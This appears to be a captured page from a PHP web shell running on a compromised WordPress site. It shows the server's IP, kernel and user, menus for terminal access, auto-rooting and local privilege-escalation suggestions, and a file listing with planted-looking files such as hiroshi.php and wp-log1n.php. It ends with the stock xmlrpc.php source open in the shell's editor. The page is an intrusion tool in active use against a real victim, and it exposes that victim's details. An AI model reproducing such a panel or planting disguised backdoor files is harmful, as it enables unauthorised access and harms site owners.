Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
landshut-muss-handeln /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb
[ DIR ]
drwxrwxrwx
2026-07-30 06:00
49164f
[ DIR ]
drwxr-xr-x
2026-08-08 15:52
be465
[ DIR ]
dr-xr-xr-x
2026-08-03 01:58
ed19a2
[ DIR ]
drwxr-xr-x
2026-09-02 09:01
logs
[ DIR ]
drwxr-xr-x
2026-08-21 09:05
wp-admin
[ DIR ]
drwxr-xr-x
2026-09-02 09:52
wp-content
[ DIR ]
dr-xr-xr-x
2026-08-29 01:27
wp-includes
[ DIR ]
drwxr-xr-x
2026-09-02 09:50
.htaccess
1.13
KB
-r-xr-xr-x
2024-06-05 09:05
0x.html
86
B
-rw-r--r--
2026-08-08 15:52
0x.txt
9
B
-rw-r--r--
2026-08-08 15:52
buy.php
1.45
KB
-r--r--r--
2024-05-25 03:00
defaults.php
1.93
KB
-r--r--r--
2024-01-05 03:53
goods.php
1.49
KB
-r--r--r--
2025-03-15 09:05
google78b7f04018dcc730.html
53
B
-rw-r--r--
2026-07-30 06:22
hiroshi.php
32.04
KB
-rw-r--r--
2026-07-30 06:22
index.php
44.75
KB
-r-xr-xr-x
2024-02-25 09:05
index.php0
32.36
KB
-rwxr-xr-x
2024-06-09 09:05
item.php
1.87
KB
-r--r--r--
2023-11-27 03:00
latest.tar.gz
11.82
MB
-rw-r--r--
2019-12-18 22:17
license.txt
19.44
KB
-rw-r--r--
2026-02-08 03:26
liesmich.html
8.39
KB
-rw-r--r--
2023-11-09 07:34
mah.php
1.87
KB
-r--r--r--
2024-09-10 03:53
networks.php
1.29
KB
-r--r--r--
2023-12-17 01:58
options.php
1.93
KB
-r--r--r--
2024-09-04 09:05
plugins.php
1.72
KB
-r--r--r--
2024-08-13 09:05
readme.html
7.25
KB
-rw-r--r--
2026-03-11 19:36
robots.txt
440
B
-r--r--r--
2024-02-27 09:05
wp-activate.php
7.18
KB
-rw-r--r--
2026-02-08 03:26
wp-blog-header.php
351
B
-rw-r--r--
2020-10-13 13:05
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-08-09 07:36
wp-config-sample.php
3.26
KB
-rw-r--r--
2026-02-08 03:26
wp-config.php
3.45
KB
-rw-r--r--
2026-07-26 22:14
wp-cron.php
5.49
KB
-rw-r--r--
2024-11-13 07:36
wp-links-opml.php
2.43
KB
-rw-r--r--
2026-02-08 03:26
wp-load.php
3.84
KB
-rw-r--r--
2024-07-26 14:31
wp-log1n.php
2
KB
-r--r--r--
2024-04-19 09:05
wp-mail.php
8.52
KB
-rw-r--r--
2026-02-08 03:26
wp-settings.php
30.33
KB
-rw-r--r--
2026-02-08 03:26
wp-signup.php
33.71
KB
-rw-r--r--
2025-04-15 19:36
wp-trackback.php
5.09
KB
-rw-r--r--
2026-02-08 03:26
wplog.php
7.73
KB
-rw-r--r--
2026-07-21 10:18
wplogbak.php
3.95
KB
-rw-r--r--
2026-07-21 10:29
xmlrpc.php
3.13
KB
-rw-r--r--
2025-04-15 19:36
Save
Rename
<?php /** * XML-RPC protocol support for WordPress * * @package WordPress */ /** * Whether this is an XML-RPC Request. * * @var bool */ define( 'XMLRPC_REQUEST', true ); // Discard unneeded cookies sent by some browser-embedded clients. $_COOKIE = array(); // $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0. // phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved if ( ! isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' ); } // Fix for mozBlog and other cases where '<?xml' isn't on the very first line. $HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA ); // phpcs:enable /** Include the bootstrap for setting up WordPress environment */ require_once __DIR__ . '/wp-load.php'; if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>'; ?> <rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd"> <service> <engineName>WordPress</engineName> <engineLink>https://wordpress.org/</engineLink> <homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink> <apis> <api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <?php /** * Fires when adding APIs to the Really Simple Discovery (RSD) endpoint. * * @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html * * @since 3.5.0 */ do_action( 'xmlrpc_rsd_apis' ); ?> </apis> </service> </rsd> <?php exit; } require_once ABSPATH . 'wp-admin/includes/admin.php'; require_once ABSPATH . WPINC . '/class-IXR.php'; require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php'; /** * Posts submitted via the XML-RPC interface get that title * * @name post_default_title * @var string */ $post_default_title = ''; /** * Filters the class used for handling XML-RPC requests. * * @since 3.1.0 * * @param string $class The name of the XML-RPC server class. */ $wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' ); $wp_xmlrpc_server = new $wp_xmlrpc_server_class(); // Fire off the request. $wp_xmlrpc_server->serve_request(); exit; /** * logIO() - Writes logging info to a file. * * @since 1.2.0 * @deprecated 3.4.0 Use error_log() * @see error_log() * * @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging. * * @param string $io Whether input or output. * @param string $msg Information describing logging reason. */ function logIO( $io, $msg ) { _deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' ); if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) { error_log( $io . ' - ' . $msg ); } }